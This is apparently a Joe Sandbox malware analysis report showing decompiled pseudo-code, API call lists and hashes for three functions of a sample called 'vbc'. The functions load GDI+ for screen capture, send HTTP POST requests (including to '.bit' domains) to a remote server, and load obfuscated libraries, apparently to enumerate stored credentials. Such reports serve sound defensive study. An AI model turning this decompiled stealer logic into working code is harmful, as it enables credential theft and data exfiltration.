                                                                                                    Function 00417B1A Relevance: 57.8, APIs: 20, Strings: 13, Instructions: 64libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00417B1A() {
				void* _t1;
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t21;

				 *0x41c890 =  *0x41c890 - 1;
				if( *0x41c890 < 0) {
					_t2 = LoadLibraryA("crtdll.dll"); // executed
					 *0x41c868 = GetProcAddress(_t2, "wcscmp");
					_t4 = LoadLibraryA("Gdiplus.dll"); // executed
					 *0x41c86c = GetProcAddress(_t4, "GdiplusStartup");
					 *0x41c870 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdiplusShutdown");
					 *0x41c874 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipCreateBitmapFromHBITMAP");
					 *0x41c878 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncodersSize");
					 *0x41c87c = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncoders");
					 *0x41c880 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipDisposeImage");
					 *0x41c884 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipSaveImageToStream");
					 *0x41c888 = GetProcAddress(LoadLibraryA("ole32.dll"), "CreateStreamOnHGlobal");
					_t21 = GetProcAddress(LoadLibraryA("ole32.dll"), "GetHGlobalFromStream");
					 *0x41c88c = _t21;
					return _t21;
				}
				return _t1;
			}







                                                                                                    0x00417b1c
                                                                                                    0x00417b23
                                                                                                    0x00417b33
                                                                                                    0x00417b3e
                                                                                                    0x00417b4d
                                                                                                    0x00417b58
                                                                                                    0x00417b72
                                                                                                    0x00417b8c
                                                                                                    0x00417ba6
                                                                                                    0x00417bc0
                                                                                                    0x00417bda
                                                                                                    0x00417bf4
                                                                                                    0x00417c0e
                                                                                                    0x00417c23
                                                                                                    0x00417c28
                                                                                                    0x00000000
                                                                                                    0x00417c28
                                                                                                    0x00417c2d

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(crtdll.dll), ref: 00417B33
                                                                                                    • GetProcAddress.KERNEL32(00000000,crtdll.dll,wcscmp), ref: 00417B39
                                                                                                    • LoadLibraryA.KERNEL32(Gdiplus.dll), ref: 00417B4D
                                                                                                    • GetProcAddress.KERNEL32(00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B53
                                                                                                    • LoadLibraryA.KERNEL32(Gdiplus.dll), ref: 00417B67
                                                                                                    • GetProcAddress.KERNEL32(00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B6D
                                                                                                    • LoadLibraryA.KERNEL32(Gdiplus.dll), ref: 00417B81
                                                                                                    • GetProcAddress.KERNEL32(00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B87
                                                                                                    • LoadLibraryA.KERNEL32(Gdiplus.dll), ref: 00417B9B
                                                                                                    • GetProcAddress.KERNEL32(00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417BA1
                                                                                                    • LoadLibraryA.KERNEL32(Gdiplus.dll), ref: 00417BB5
                                                                                                    • GetProcAddress.KERNEL32(00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000), ref: 00417BBB
                                                                                                    • LoadLibraryA.KERNEL32(Gdiplus.dll), ref: 00417BCF
                                                                                                    • GetProcAddress.KERNEL32(00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000), ref: 00417BD5
                                                                                                    • LoadLibraryA.KERNEL32(Gdiplus.dll), ref: 00417BE9
                                                                                                    • GetProcAddress.KERNEL32(00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000), ref: 00417BEF
                                                                                                    • LoadLibraryA.KERNEL32(ole32.dll), ref: 00417C03
                                                                                                    • GetProcAddress.KERNEL32(00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000), ref: 00417C09
                                                                                                    • LoadLibraryA.KERNEL32(ole32.dll), ref: 00417C1D
                                                                                                    • GetProcAddress.KERNEL32(00000000,ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000), ref: 00417C23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                    • String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
                                                                                                    • API String ID: 2574300362-2815069134
                                                                                                    • Opcode ID: 57a083585dbc8ce9df7a63cc0a821fb4195fa2904eec68678409c4ef2343df9d
                                                                                                    • Instruction ID: 8590a6e993e3993f4c60c6cfae4e59332f73d92cf5cac50a27a19d2551d8218b
                                                                                                    • Opcode Fuzzy Hash: 57a083585dbc8ce9df7a63cc0a821fb4195fa2904eec68678409c4ef2343df9d
                                                                                                    • Instruction Fuzzy Hash: 3911D0F17C430069DA0177B2DD8BAE635B4BBC1B4A730447B7104722D2E97C888196DD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00418688 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 375libraryloadernetworkCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 494 418688-41868c 495 418691-418696 494->495 495->495 496 418698-4186d8 call 403980 * 3 495->496 503 4186e7-41871d call 4034e4 call 40357c * 2 call 4039e8 GetModuleHandleA 496->503 504 4186da-4186e2 call 40357c 496->504 514 41872f-418731 503->514 515 41871f-41872d call 4039e8 LoadLibraryA 503->515 504->503 517 418733-41874d call 4039e8 * 2 LoadLibraryA 514->517 518 41874f-418934 call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 404f00 * 7 call 403790 call 403990 InternetCrackUrlA call 4036dc call 403790 call 4039f0 call 403a78 514->518 515->514 517->518 568 418977-41898b InternetOpenA 518->568 569 418936-418974 call 4036dc call 4037dc call 417f6c call 403990 518->569 570 418991-4189ce InternetConnectA 568->570 571 418adc-418ae3 568->571 569->568 585 4189d4-4189fb call 4036dc call 403a78 570->585 586 418ad6-418ad9 570->586 577 418ae5-418b23 call 4036dc * 2 call 418124 571->577 578 418b28-418b7f call 403538 call 4034e4 call 403508 * 4 571->578 577->578 603 418a04-418a2b call 403990 HttpOpenRequestA 585->603 604 4189fd 585->604 586->571 609 418a31-418a35 603->609 610 418ad0-418ad4 InternetCloseHandle 603->610 604->603 612 418a55-418a77 call 403790 call 403990 HttpSendRequestA 609->612 613 418a37-418a51 call 403790 call 403990 609->613 610->586 612->610 625 418a79-418aaf call 404f00 InternetReadFile call 4035d4 612->625 613->612 629 418ab4-418ac8 call 403798 625->629 629->610 632 418aca-418ace 629->632 632->610 632->625
                                                                                                    C-Code - Quality: 72%
                                                                                                    			E00418688(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				_Unknown_base(*)()* _v24;
				_Unknown_base(*)()* _v28;
				_Unknown_base(*)()* _v32;
				_Unknown_base(*)()* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				_Unknown_base(*)()* _v48;
				char _v52;
				char _v56;
				long _v60;
				void* _v64;
				void* _v68;
				int _v72;
				char _v73;
				signed int _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v132;
				char _v388;
				char _v516;
				char _v644;
				char _v2692;
				char _v3716;
				char _v3776;
				void _v69412;
				char _v69416;
				char _v69420;
				char _v69424;
				char _v69428;
				char _v69432;
				char _v69436;
				void* __ecx;
				long _t222;
				long _t283;
				void* _t297;
				struct HINSTANCE__* _t320;
				struct HINSTANCE__* _t324;
				void* _t325;
				intOrPtr _t327;
				intOrPtr _t350;
				void* _t357;
				struct _SYSTEMTIME _t368;
				intOrPtr* _t370;
				intOrPtr _t372;
				intOrPtr _t373;

				_t372 = _t373;
				_t327 = 0x21e6;
				do {
					_push(0);
					_push(0);
					_t327 = _t327 - 1;
				} while (_t327 != 0);
				_push(_t327);
				_t1 =  &_v8;
				 *_t1 = _t327;
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				E00403980(_v12);
				E00403980(_v16);
				_t368 =  &_v3776;
				_push(_t372);
				_push(0x418b80);
				_push( *[fs:eax]);
				 *[fs:eax] = _t373;
				if(_v16 == 0) {
					E0040357C( &_v16, 0x418b98);
				}
				E004034E4( &_v92);
				E0040357C( &_v56, _v8);
				_v73 = 0;
				E0040357C( &_v52, "wininet.dll");
				_t324 = GetModuleHandleA(E004039E8( &_v52));
				if(_t324 == 0) {
					_t320 = LoadLibraryA(E004039E8( &_v52)); // executed
					_t324 = _t320;
				}
				if(_t324 == 0) {
					(E004039E8( &_v52))[7] = 0;
					_t324 = LoadLibraryA(E004039E8( &_v52));
				}
				_v20 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0xc]));
				_v24 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0x1a]));
				_v28 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0x2b]));
				_v32 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0x3c]));
				_v36 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0x53]));
				_v40 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0x64]));
				_t370 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0x75]));
				_v44 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0x89]));
				_v48 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0x9b]));
				E00404F00();
				E00404F00();
				E00404F00();
				E00404F00();
				E00404F00();
				E00404F00();
				E00404F00();
				 *_t368 = 0x3c;
				 *((intOrPtr*)(_t368 + 4)) =  &_v132;
				 *((intOrPtr*)(_t368 + 8)) = 0x20;
				 *(_t368 + 0x10) =  &_v388;
				 *((intOrPtr*)(_t368 + 0x14)) = 0x100;
				 *((intOrPtr*)(_t368 + 0x1c)) =  &_v516;
				 *((intOrPtr*)(_t368 + 0x20)) = 0x80;
				 *((intOrPtr*)(_t368 + 0x24)) =  &_v644;
				 *((intOrPtr*)(_t368 + 0x28)) = 0x80;
				 *(_t368 + 0x2c) =  &_v2692;
				 *((intOrPtr*)(_t368 + 0x30)) = 0x800;
				 *((intOrPtr*)(_t368 + 0x34)) =  &_v3716;
				 *((intOrPtr*)(_t368 + 0x38)) = 0x400;
				_t222 = E00403790(_v56);
				InternetCrackUrlA(E00403990(_v56), _t222, 0x90000000, _t368);
				E004036DC( &_v100,  *(_t368 + 0x10));
				E004039F0(_v100, 4, E00403790(_v100) - 3,  &_v69416);
				if(E00403A78(0x418c60, _v69416) != 0) {
					_v73 = 1;
					E004036DC( &_v69420,  *(_t368 + 0x10));
					E004037DC( &_v88, _v69420, "Host: ");
					E00417F6C(_v100, _t324,  &_v69424, _t368, _t370);
					 *(_t368 + 0x10) = E00403990(_v69424);
				}
				_t325 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", 0, 0, 0, 0);
				if(_t325 != 0) {
					_v84 = 0x2dc6c0;
					_v48(_t325, 6,  &_v84, 4);
					_v48(_t325, 5,  &_v84, 4);
					_v64 = InternetConnectA(_t325,  *(_t368 + 0x10),  *(_t368 + 0x18), 0, 0, 3, 0, 0);
					if(_v64 != 0) {
						_v80 = 0x84003300;
						E004036DC( &_v69428,  *((intOrPtr*)(_t368 + 4)));
						if(E00403A78(0x418cb4, _v69428) != 0) {
							_v80 = _v80 | 0x00800000;
						}
						_v68 = HttpOpenRequestA(_v64, E00403990(_v16),  *(_t368 + 0x2c), 0, 0, 0, _v80, 0);
						if(_v68 != 0) {
							if(_v73 != 0) {
								_v32(_v68, E00403990(_v88), E00403790(_v88), 0xa0000000);
							}
							_t283 = E00403790(_v12);
							if(HttpSendRequestA(_v68, E00418CB8, 0, E00403990(_v12), _t283) != 0) {
								do {
									E00404F00();
									_v72 = InternetReadFile(_v68,  &_v69412, 0x10064,  &_v60);
									E004035D4( &_v96, _v60,  &_v69412);
									_t297 = E00403798( &_v92, _v96);
									asm("sbb eax, eax");
								} while (_t297 + 1 != 0 && _v60 != 0);
							}
						}
						InternetCloseHandle(_v68); // executed
					}
					 *_t370(_v64);
				}
				 *_t370(_t325);
				if(_v92 == 0) {
					_push(_v100);
					_push(_v12);
					_push( *(_t368 + 0x18));
					_push( &_v92);
					E004036DC( &_v69432,  *(_t368 + 0x2c));
					_push(_v69432);
					E004036DC( &_v69436,  *(_t368 + 0x10));
					_pop(_t357);
					E00418124(_v69436, _t325, _v16, _t357, _t370);
				}
				E00403538(_a4, _v92);
				E004034E4( &_v92);
				_pop(_t350);
				 *[fs:eax] = _t350;
				_push(E00418B87);
				E00403508( &_v69436, 6);
				E00403508( &_v100, 4);
				E00403508( &_v56, 2);
				return E00403508( &_v16, 3);
			}























































                                                                                                    0x00418689
                                                                                                    0x0041868c
                                                                                                    0x00418691
                                                                                                    0x00418691
                                                                                                    0x00418693
                                                                                                    0x00418695
                                                                                                    0x00418695
                                                                                                    0x00418698
                                                                                                    0x00418699
                                                                                                    0x00418699
                                                                                                    0x0041869f
                                                                                                    0x004186a2
                                                                                                    0x004186a5
                                                                                                    0x004186ab
                                                                                                    0x004186b3
                                                                                                    0x004186bb
                                                                                                    0x004186c0
                                                                                                    0x004186c8
                                                                                                    0x004186c9
                                                                                                    0x004186ce
                                                                                                    0x004186d1
                                                                                                    0x004186d8
                                                                                                    0x004186e2
                                                                                                    0x004186e2
                                                                                                    0x004186ea
                                                                                                    0x004186f5
                                                                                                    0x004186fa
                                                                                                    0x00418706
                                                                                                    0x00418719
                                                                                                    0x0041871d
                                                                                                    0x00418728
                                                                                                    0x0041872d
                                                                                                    0x0041872d
                                                                                                    0x00418731
                                                                                                    0x0041873b
                                                                                                    0x0041874d
                                                                                                    0x0041874d
                                                                                                    0x00418761
                                                                                                    0x00418776
                                                                                                    0x0041878b
                                                                                                    0x004187a0
                                                                                                    0x004187b5
                                                                                                    0x004187ca
                                                                                                    0x004187df
                                                                                                    0x004187f5
                                                                                                    0x0041880c
                                                                                                    0x00418817
                                                                                                    0x00418827
                                                                                                    0x00418837
                                                                                                    0x00418847
                                                                                                    0x00418857
                                                                                                    0x00418867
                                                                                                    0x00418873
                                                                                                    0x00418878
                                                                                                    0x00418881
                                                                                                    0x00418884
                                                                                                    0x00418891
                                                                                                    0x00418894
                                                                                                    0x004188a1
                                                                                                    0x004188a4
                                                                                                    0x004188b1
                                                                                                    0x004188b4
                                                                                                    0x004188c1
                                                                                                    0x004188c4
                                                                                                    0x004188d1
                                                                                                    0x004188d4
                                                                                                    0x004188e4
                                                                                                    0x004188f3
                                                                                                    0x004188fc
                                                                                                    0x0041891d
                                                                                                    0x00418934
                                                                                                    0x00418936
                                                                                                    0x00418943
                                                                                                    0x00418956
                                                                                                    0x00418964
                                                                                                    0x00418974
                                                                                                    0x00418974
                                                                                                    0x00418987
                                                                                                    0x0041898b
                                                                                                    0x00418991
                                                                                                    0x004189a1
                                                                                                    0x004189ad
                                                                                                    0x004189c7
                                                                                                    0x004189ce
                                                                                                    0x004189d4
                                                                                                    0x004189e4
                                                                                                    0x004189fb
                                                                                                    0x004189fd
                                                                                                    0x004189fd
                                                                                                    0x00418a24
                                                                                                    0x00418a2b
                                                                                                    0x00418a35
                                                                                                    0x00418a52
                                                                                                    0x00418a52
                                                                                                    0x00418a58
                                                                                                    0x00418a77
                                                                                                    0x00418a79
                                                                                                    0x00418a84
                                                                                                    0x00418aa0
                                                                                                    0x00418aaf
                                                                                                    0x00418aba
                                                                                                    0x00418ac3
                                                                                                    0x00418ac6
                                                                                                    0x00418a79
                                                                                                    0x00418a77
                                                                                                    0x00418ad4
                                                                                                    0x00418ad4
                                                                                                    0x00418ada
                                                                                                    0x00418ada
                                                                                                    0x00418add
                                                                                                    0x00418ae3
                                                                                                    0x00418ae8
                                                                                                    0x00418aec
                                                                                                    0x00418af1
                                                                                                    0x00418af5
                                                                                                    0x00418aff
                                                                                                    0x00418b0a
                                                                                                    0x00418b14
                                                                                                    0x00418b22
                                                                                                    0x00418b23
                                                                                                    0x00418b23
                                                                                                    0x00418b2e
                                                                                                    0x00418b36
                                                                                                    0x00418b3d
                                                                                                    0x00418b40
                                                                                                    0x00418b43
                                                                                                    0x00418b53
                                                                                                    0x00418b60
                                                                                                    0x00418b6d
                                                                                                    0x00418b7f

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418714
                                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 00418728
                                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 00418748
                                                                                                    • GetProcAddress.KERNEL32(00000000,-0000000C,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 0041875C
                                                                                                    • GetProcAddress.KERNEL32(00000000,-0000001A,00000000,-0000000C,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 00418771
                                                                                                    • GetProcAddress.KERNEL32(00000000,-0000002B,00000000,-0000001A,00000000,-0000000C,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000), ref: 00418786
                                                                                                    • GetProcAddress.KERNEL32(00000000,-0000003C,00000000,-0000002B,00000000,-0000001A,00000000,-0000000C,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5), ref: 0041879B
                                                                                                    • GetProcAddress.KERNEL32(00000000,-00000053,00000000,-0000003C,00000000,-0000002B,00000000,-0000001A,00000000,-0000000C,00000000,00000000,00418B80,?,?,0041B0FC), ref: 004187B0
                                                                                                    • GetProcAddress.KERNEL32(00000000,-00000064,00000000,-00000053,00000000,-0000003C,00000000,-0000002B,00000000,-0000001A,00000000,-0000000C,00000000,00000000,00418B80), ref: 004187C5
                                                                                                    • GetProcAddress.KERNEL32(00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C,00000000,-0000002B,00000000,-0000001A,00000000,-0000000C,00000000,00000000), ref: 004187DA
                                                                                                    • GetProcAddress.KERNEL32(00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C,00000000,-0000002B,00000000,-0000001A,00000000,-0000000C), ref: 004187F0
                                                                                                    • GetProcAddress.KERNEL32(00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C,00000000,-0000002B,00000000,-0000001A), ref: 00418807
                                                                                                    • InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 004188F3
                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C), ref: 00418984
                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 004189C4
                                                                                                    • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 00418A21
                                                                                                    • HttpSendRequestA.WININET(00000000,00418CB8,00000000,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418A72
                                                                                                    • InternetReadFile.WININET(00000000,?,00010064,?,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418A9D
                                                                                                    • InternetCloseHandle.WININET(00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418AD4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Internet$HandleHttpLibraryLoadOpenRequest$CloseConnectCrackFileModuleReadSend
                                                                                                    • String ID: .bit$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$wininet.dll
                                                                                                    • API String ID: 1919173369-2879170074
                                                                                                    • Opcode ID: 56a08f971a344ee113826defbb1e72536bdb7fe50e4f450330abf4f2e38adec9
                                                                                                    • Instruction ID: 76fb72323b8ae20ff65678eff3f65f90e6b3cd7dcd45201054b3a4b47af70050
                                                                                                    • Opcode Fuzzy Hash: 56a08f971a344ee113826defbb1e72536bdb7fe50e4f450330abf4f2e38adec9
                                                                                                    • Instruction Fuzzy Hash: 8AE1EAB1910219ABDB10EFA5CC86BDEBBBCBF44305F10417AF504B6681DB78AA458B58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B15C Relevance: 9.2, APIs: 6, Instructions: 198libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    C-Code - Quality: 54%
                                                                                                    			E0040B15C(void* __ebx, void* __edi, void* __esi) {
				_Unknown_base(*)()* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v52;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				CHAR* _t72;
				struct HINSTANCE__* _t95;
				_Unknown_base(*)()* _t111;
				void* _t125;
				intOrPtr* _t157;
				struct HINSTANCE__* _t158;
				signed int _t159;
				void* _t160;
				intOrPtr _t170;
				intOrPtr _t175;
				intOrPtr _t179;
				intOrPtr* _t192;
				void* _t194;
				void* _t195;
				signed int _t200;
				intOrPtr _t202;
				intOrPtr _t203;

				_t202 = _t203;
				_t160 = 0xc;
				do {
					_push(0);
					_push(0);
					_t160 = _t160 - 1;
				} while (_t160 != 0);
				 *[fs:eax] = _t203;
				E00408120(0x9b,  &_v72);
				_t72 = E00403990(_v72);
				E00408120(0x9a,  &_v76);
				_t157 = GetProcAddress(LoadLibraryA(E00403990(_v76)), _t72);
				E0040813C(0x9c,  &_v80);
				 *_t157(E00403D3C(_v80),  &_v52,  *[fs:eax], 0x40b3c3, _t202, __edi, __esi, __ebx, _t160);
				E0040813C(0x9d,  &_v84);
				 *_t157(E00403D3C(_v84),  &_v68);
				E00408120(0x9e,  &_v88);
				_t95 = LoadLibraryA(E00403990(_v88)); // executed
				_t158 = _t95;
				if(_t158 != 0) {
					E00408120(0x9f,  &_v92);
					_t111 = GetProcAddress(_t158, E00403990(_v92));
					E00408120(0xa0,  &_v96);
					_t192 = GetProcAddress(_t158, E00403990(_v96));
					E00408120(0xa1,  &_v100);
					_v8 = GetProcAddress(_t158, E00403990(_v100));
					_v12 = 0;
					_t125 =  *_t111( &_v52, 0,  &_v16); // executed
					if(_t125 == 0) {
						_push( &_v20);
						_push( &_v12);
						_push(0x200);
						_push(_v16);
						if( *_t192() == 0) {
							_t194 = _v12 - 1;
							if(_t194 >= 0) {
								_t195 = _t194 + 1;
								_t159 = 0;
								do {
									_t179 =  *0x40b130; // 0x40b134
									E004047B4( &_v24, _t179);
									_push( &_v24);
									_push(0);
									_push(0);
									_push(0);
									_t200 = (_t159 << 3) - _t159;
									_push( *((intOrPtr*)(_v20 + 0x18 + _t200 * 8)));
									_push( *((intOrPtr*)(_v20 + 0x14 + _t200 * 8)));
									_push( &_v68);
									_push(_v16);
									if(_v8() == 0) {
										E0040370C( &_v28,  *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x14 + _t200 * 8)) + 0x10)));
										E0040370C( &_v32,  *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x18 + _t200 * 8)) + 0x10)));
										E0040370C( &_v36,  *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x1c)) + 0x10)));
										if(E00403790(_v28) != 0 && E00403790(_v36) != 0) {
											E00408120(0xa2,  &_v104);
											E00405210(0x40b3e8, _t159, _v28, _v104, _t195, _t200, 0x40b3dc, _v36, _v32);
										}
									}
									_t159 = _t159 + 1;
									_t195 = _t195 - 1;
								} while (_t195 != 0);
							}
						}
					}
				}
				_pop(_t170);
				 *[fs:eax] = _t170;
				_push(E0040B3CA);
				E00403508( &_v104, 5);
				E00403B98( &_v84, 2);
				E00403508( &_v76, 2);
				E00403508( &_v36, 3);
				_t175 =  *0x40b130; // 0x40b134
				return E00404224( &_v24, 2, _t175);
			}







































                                                                                                    0x0040b15d
                                                                                                    0x0040b15f
                                                                                                    0x0040b164
                                                                                                    0x0040b164
                                                                                                    0x0040b166
                                                                                                    0x0040b168
                                                                                                    0x0040b168
                                                                                                    0x0040b17a
                                                                                                    0x0040b185
                                                                                                    0x0040b18d
                                                                                                    0x0040b19b
                                                                                                    0x0040b1b4
                                                                                                    0x0040b1c2
                                                                                                    0x0040b1d0
                                                                                                    0x0040b1de
                                                                                                    0x0040b1ec
                                                                                                    0x0040b1f6
                                                                                                    0x0040b204
                                                                                                    0x0040b209
                                                                                                    0x0040b20d
                                                                                                    0x0040b21b
                                                                                                    0x0040b22a
                                                                                                    0x0040b239
                                                                                                    0x0040b24d
                                                                                                    0x0040b257
                                                                                                    0x0040b26b
                                                                                                    0x0040b270
                                                                                                    0x0040b27d
                                                                                                    0x0040b281
                                                                                                    0x0040b28a
                                                                                                    0x0040b28e
                                                                                                    0x0040b28f
                                                                                                    0x0040b297
                                                                                                    0x0040b29c
                                                                                                    0x0040b2a5
                                                                                                    0x0040b2a8
                                                                                                    0x0040b2ae
                                                                                                    0x0040b2af
                                                                                                    0x0040b2b1
                                                                                                    0x0040b2b4
                                                                                                    0x0040b2ba
                                                                                                    0x0040b2c2
                                                                                                    0x0040b2c3
                                                                                                    0x0040b2c5
                                                                                                    0x0040b2c7
                                                                                                    0x0040b2ce
                                                                                                    0x0040b2d7
                                                                                                    0x0040b2df
                                                                                                    0x0040b2e3
                                                                                                    0x0040b2e7
                                                                                                    0x0040b2ed
                                                                                                    0x0040b2fc
                                                                                                    0x0040b30e
                                                                                                    0x0040b31f
                                                                                                    0x0040b32e
                                                                                                    0x0040b351
                                                                                                    0x0040b361
                                                                                                    0x0040b361
                                                                                                    0x0040b32e
                                                                                                    0x0040b366
                                                                                                    0x0040b367
                                                                                                    0x0040b367
                                                                                                    0x0040b2b1
                                                                                                    0x0040b2a8
                                                                                                    0x0040b29c
                                                                                                    0x0040b281
                                                                                                    0x0040b370
                                                                                                    0x0040b373
                                                                                                    0x0040b376
                                                                                                    0x0040b383
                                                                                                    0x0040b390
                                                                                                    0x0040b39d
                                                                                                    0x0040b3aa
                                                                                                    0x0040b3b2
                                                                                                    0x0040b3c2

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 0040B1A9
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,0040B3C3,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F), ref: 0040B1AF
                                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 0040B204
